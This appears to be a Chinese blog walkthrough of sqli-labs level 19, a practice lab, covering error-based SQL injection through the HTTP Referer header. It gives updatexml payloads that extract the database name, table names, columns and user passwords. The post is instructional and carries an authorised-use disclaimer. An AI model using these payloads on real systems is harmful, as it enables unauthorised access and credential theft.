sqli-labs关卡19(基于http头部报错盲注)通关思路

文章目录


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关我们通过http头部的user-agent值进行注入,了解了http头部的一些常见可以注入的地方。这一关同样也是http头部注入,只不过不是user-agent了。这一关我就不先看源码了,有了上一关经验。

二、靶场第十九关通关思路

  • 1、判断注入点
  • 2、爆数据库名
  • 3、爆数据库表
  • 4、爆数据库列
  • 5、爆数据库关键信息

1、判断注入点

这里发现19关页面和上一关基本没区别,我们这里用一个测试账号登录(用admin)。因为登录才能记录用户的信息。(如图所示)

这里发现页面回显了一个referer字段,从上一关讲解可以知道,referer字段是http请求头部内容之一。它的作用是来记录你源地址url的,因为我没有跳转到其他页面,就是在第十九关页面输信息。所以referer字段就是第十九关的地址。因为页面带回的这个referer字段内容,那么可想而知,会不会是后台管理员把referer拼接到数据库后回显到web页面的呢?我们不妨试一试

用 and 1=1和and 1=2 发现页面正常,排除数字型。(如图所示)

直接提交单引号发现页面报错,报错语句为

You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use

near 'xxx.xxx.xxx.xxx')' at line 1

通过报错语句可以猜测原始语句应该是

php 复制代码
('refer','ip')

因为我们多了一个单引号所以报错了,我们尝试构造payload

也就是

php 复制代码
1',1)#

那么在原始语句就是

php 复制代码
('refer',1)#','ip')

这样就构造成功了,页面正常(如图所示)

现在我们来看源代码看看是不是这么回事

发现是和我们想到的语句一样。因为有报错回显,无回显数据内容,所以用报错盲注。

2、爆数据库名

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select database()),0x3a),1),1)#

3、爆数据库表

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1),1)#


得到关键数据库表名users

4、爆数据库列

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1),1)#
php 复制代码
1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1),1)#



得到关键数据库列username,password

5、爆数据库关键信息

注入语句为

php 复制代码
1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1),1)#
php 复制代码
1' and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1),1)#


得到账号密码


总结

这一关也是通过http头部注入,只是注入点不同。只要知道原理,和怎么构造payload的话,基本没什么问题。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

相关推荐
tang777893 小时前
一张图看懂 HTTP、SOCKS5 代理的区别
网络·网络协议·http
Moshow郑锴3 小时前
pgsql常见查询索引优化(等值条件+范围条件)
数据库·sql·mysql
枷锁—sha5 小时前
【CTFshow-pwn系列】03_栈溢出【pwn 045】详解:Ret2Libc 之 32位动态泄露(补充本地 Libc 手动加载指南)
服务器·网络·网络安全·系统安全
liann1196 小时前
4.3.2_WEB——WEB后端语言——PHP
开发语言·前端·网络·安全·web安全·网络安全·php
byzh_rc6 小时前
[深度学习网络从入门到入土] 含并行连结的网络GoogLeNet
网络·人工智能·深度学习
乾元6 小时前
对抗性攻击:一张贴纸如何让自动驾驶视觉系统失效?
运维·网络·人工智能·安全·机器学习·自动驾驶
YIN_尹7 小时前
【MySQL】SQL里的“连连看”:从笛卡尔积到自连接
android·sql·mysql
全栈前端老曹7 小时前
【Redis】Pipeline 与性能优化——批量命令处理、提升吞吐量、减少网络延迟
前端·网络·数据库·redis·缓存·性能优化·全栈
MediaTea9 小时前
Python:生成器对象的扩展接口
开发语言·网络·python
远方16099 小时前
114-Oracle Database 26ai在Oracle Linux 9上的OUI图形界面安装
linux·服务器·数据库·sql·oracle·database